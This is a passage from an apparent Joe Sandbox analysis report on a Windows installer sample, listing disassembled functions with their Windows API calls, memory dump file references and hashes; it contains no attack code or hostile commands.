                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                              Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                              • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                              • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                              • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                              Function 00404CFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                              • GetMessagePos.USER32 ref: 00404D22
                                              • ScreenToClient.USER32(?,?), ref: 00404D3C
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                              Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                              • MulDiv.KERNEL32(0006AB66,00000064,0006AD6A), ref: 00402F74
                                              • wsprintfW.USER32 ref: 00402F84
                                              • SetWindowTextW.USER32(?,?), ref: 00402F94
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                              • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                              • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                              • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                              Function 73F525B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 73F5121B: GlobalAlloc.KERNEL32(00000040,?,73F5123B,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F51225
                                              • GlobalFree.KERNEL32(?), ref: 73F526A3
                                              • GlobalFree.KERNEL32(00000000), ref: 73F526D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: b982249fca5cdefd7550295221f36a1e669575db8a2007f9c16740be040ab67e
                                              • Instruction ID: 1acb46a5e4a24918c94af3c219d6ae9d5b7c6759948d434817c5f918fac53ca0
                                              • Opcode Fuzzy Hash: b982249fca5cdefd7550295221f36a1e669575db8a2007f9c16740be040ab67e
                                              • Instruction Fuzzy Hash: 1D31BC3320510AFFDB16AF65CDA4F2E7BFAEB853907354229F10AC7260C730A8058B61
                                              Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                              • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              • API String ID: 2667972263-0
                                              • Opcode ID: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                              • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                              • Opcode Fuzzy Hash: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                              • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                              Function 00405DCB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 3248276644-2827779590
                                              • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                              • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                              • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                              • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                              Function 73F518D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: 4f8204407e08878a1fe099d1dd156029c37ef8e3ce162cca76b6d081ef11c8b1
                                              • Instruction ID: f62e65283915a1130066108c5f3b6ab29b1b5f1d79dbdb5a5f6e492366a89dc1
                                              • Opcode Fuzzy Hash: 4f8204407e08878a1fe099d1dd156029c37ef8e3ce162cca76b6d081ef11c8b1
                                              • Instruction Fuzzy Hash: 7951B332D10D5AEBDF239FA48940BADBBFAAB443D0B154259F406E3185D770BE818791
                                              Function 73F523E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 73F52522
                                                • Part of subcall function 73F5122C: lstrcpynW.KERNEL32(00000000,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F5123C
                                              • GlobalAlloc.KERNEL32(00000040), ref: 73F524A8
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73F524C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: a97b84a92057db44a9c87f3ae6ce3446388494220a9ca59e8ff776a490950b8b
                                              • Instruction ID: 95dd64170c8dd590d5319f92cab279ef87a44695d69ea8a7d5a4c34354c7aa4e
                                              • Opcode Fuzzy Hash: a97b84a92057db44a9c87f3ae6ce3446388494220a9ca59e8ff776a490950b8b
                                              • Instruction Fuzzy Hash: AC41CDB210870AEFD715AF61DC90B6A77F8FB58391F204A2DF44BC6192D730A545CBA1
                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                              • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                              • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                              • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(?), ref: 00401E51
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                              • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                              • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
